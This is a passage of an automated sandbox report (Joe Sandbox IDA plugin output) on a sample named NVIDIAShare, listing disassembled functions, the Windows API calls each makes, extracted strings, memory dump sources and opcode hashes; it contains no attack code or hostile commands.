                                                            • _swprintf.LIBCMT ref: 0101C477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0101C48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101C4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101C4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C509
                                                            • _swprintf.LIBCMT ref: 0101C535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101C548
                                                            • _swprintf.LIBCMT ref: 0101C59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0101C5AF
                                                              • Part of subcall function 0101AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
                                                              • Part of subcall function 0101AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
                                                            • Instruction ID: da0a8abd295e4b535dad5a26aebcaac267da91cb0451151e9f7264ebc25dd081
                                                            • Opcode Fuzzy Hash: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
                                                            • Instruction Fuzzy Hash: ED917372148345BBE2319AA4DD49FFB7BECEB4A700F044819F7C9DA085D67AE6048762
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01006FAA
                                                            • _wcslen.LIBCMT ref: 01007013
                                                            • _wcslen.LIBCMT ref: 01007084
                                                              • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
                                                              • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                              • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                              • Part of subcall function 0100A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
                                                              • Part of subcall function 0100A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 01007139
                                                            • CloseHandle.KERNEL32(00000000), ref: 01007155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 01007298
                                                              • Part of subcall function 01009DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
                                                              • Part of subcall function 01009DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70
                                                              • Part of subcall function 01009620: CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B
                                                              • Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                              • Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
                                                            • Instruction ID: d468226b18f36b42239ba321f75972b55fbf4c9e34f8fb9fc6045c98d0c20a36
                                                            • Opcode Fuzzy Hash: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
                                                            • Instruction Fuzzy Hash: 58C1B2B1900645AAFB26DB78CC81BEEB7ACBF14300F00455AF9D6E71C1D779B6848B61
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
                                                            • Instruction ID: 649a79ec5fab2f3b232b8cc015445a4b6726e495beb1da0414bcea7bfc4c180c
                                                            • Opcode Fuzzy Hash: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
                                                            • Instruction Fuzzy Hash: C1C24872E086298FDB65CE68DD407EAB7F5EB44304F1441EAD98DE7241E778AE818F40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
                                                            • Instruction ID: d59c60b1e4a6152a39eefc46e876a1faced6b55a6543b2a301688526d96e63b7
                                                            • Opcode Fuzzy Hash: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
                                                            • Instruction Fuzzy Hash: 9D32A1715106859FFB1ADF74C894AEA3BA5BF15300F0845BDEDCA8F2C2DA74A549CB20
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01002874
                                                            • _strlen.LIBCMT ref: 01002E3F
                                                              • Part of subcall function 010102BA: __EH_prolog.LIBCMT ref: 010102BF
                                                              • Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001044E), ref: 01011BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
                                                            • Instruction ID: 967554b208251902983a41a48b7a3b27df823c820547e3ec87fb14a6e3c9828b
                                                            • Opcode Fuzzy Hash: 7cbd3f1beb7ac275f85b55c301550474d41f695897dc89aadfe2cb9bc5783be8
                                                            • Instruction Fuzzy Hash: 6262E4715006458FFB1ADF38C8886EA3BA1BF64300F0845BEEDDA8B2C2DB759545CB60
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0101F844
                                                            • IsDebuggerPresent.KERNEL32 ref: 0101F910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0101F930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0101F93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
                                                            • Instruction ID: 7cc8686e5964e7804ef8269a00d8d5d85b81af89c99ca3cf040891ed4e38ce4b
                                                            • Opcode Fuzzy Hash: 33dd3e55305a5d974c9f738476a5e3e022fad23c1ac7952bd56bb2e34ccf5dc3
                                                            • Instruction Fuzzy Hash: 27312BB5D4521ADBDB21DFA4D9897CCBBF8BF04304F1040DAE44DAB254EB759A888F44
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0101E5E8,0000001C,0101E7DD,00000000,?,?,?,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0101E5E8,00000004,01061CEC,0101E86D), ref: 0101E6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
                                                            • Instruction ID: f5783f18896788a5adddb61eaed8e0b2581357fd7fceb785b3640053557cd7e8
                                                            • Opcode Fuzzy Hash: 5e4d1af27fe096fb9a7ffcc892af1d617e293605103f2521ccdce6260a2c90cb
                                                            • Instruction Fuzzy Hash: 2101D4326001096BEB24DE29DC49ADD7BEABFC4224F0CC160ED99DB148D638D9058680
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01028FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01028FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 01028FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: d2a9faca21dc5d88dba16d648ae44d1352ac8314d2b60a3a3aa5944c49cef278
                                                            • Instruction ID: 35d191b160676e77ae8cfb2abf9217132951dd5ef155ac2260110fe556458fb0
                                                            • Opcode Fuzzy Hash: d2a9faca21dc5d88dba16d648ae44d1352ac8314d2b60a3a3aa5944c49cef278
                                                            • Instruction Fuzzy Hash: E031D675901229ABCB61DF28D888BDCBBF8BF08310F5041DAE85CA7250E7749B858F44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 07fa4350fef49a05be5baf472a48f3d6712adb33a67d384f234fbe7827207036
                                                            • Instruction ID: e31529c4bdba0a60fc9daeb7bd6e515bf03416724080e2a0c3a7b663ba50e44d
                                                            • Opcode Fuzzy Hash: 07fa4350fef49a05be5baf472a48f3d6712adb33a67d384f234fbe7827207036
                                                            • Instruction Fuzzy Hash: 28314671800269AFDB248E7CCC84EFB7BFDEF85314F0441E8E998D7241EA34AA448B50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 826a7ec12831c9f14257fcae7966b07166a9ac6892a8aae26e6f4152fde86136
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: B3022D71E002299FDF14CFA9C8806ADBBF5FF48314F1581AAD959E7385D731AD418B90
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
                                                            • Instruction ID: d37cd224c35d60a75ac3845788b527c85c020bc1ce6cd42a0970a20fb95f1b6a
                                                            • Opcode Fuzzy Hash: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
                                                            • Instruction Fuzzy Hash: B701717A200309AAD7219F64DC45F9B77BCFF08710F404422FA8597144D3799914CBA5
                                                            APIs
                                                            • GetLastError.KERNEL32(01006DDF,00000000,00000400), ref: 01006C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 01006C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
                                                            • Instruction ID: aaf3ce3f98da10f8d30ac02543ddfaa991c6f3c05fc117a96e6c58695c4badb8
                                                            • Opcode Fuzzy Hash: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
                                                            • Instruction Fuzzy Hash: 82D0C731344304BFFA550A614D46F2A7B9DBF45B55F14C4047795D80D0C67A94249715
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,010319EF,?,?,00000008,?,?,0103168F,00000000), ref: 01031C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
                                                            • Instruction ID: 3e0140f2afd3cd21a77705dc58de485500983fee187965b91e2a98506531ecb0
                                                            • Opcode Fuzzy Hash: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
                                                            • Instruction Fuzzy Hash: 76B14A312206089FE759CF2CC486B657BE4FF89365F258698E9D9CF2A1C335D992CB40
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0100B16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
                                                            • Instruction ID: 86870ecc5428a4c327d346f5e3f011fe405db3b60f1d97de61280db7d57da781
                                                            • Opcode Fuzzy Hash: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
                                                            • Instruction Fuzzy Hash: CAF03AB8E002088FDB39CB18EA966D973F5FB98355F104695E69593384C3B9B9C08F61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
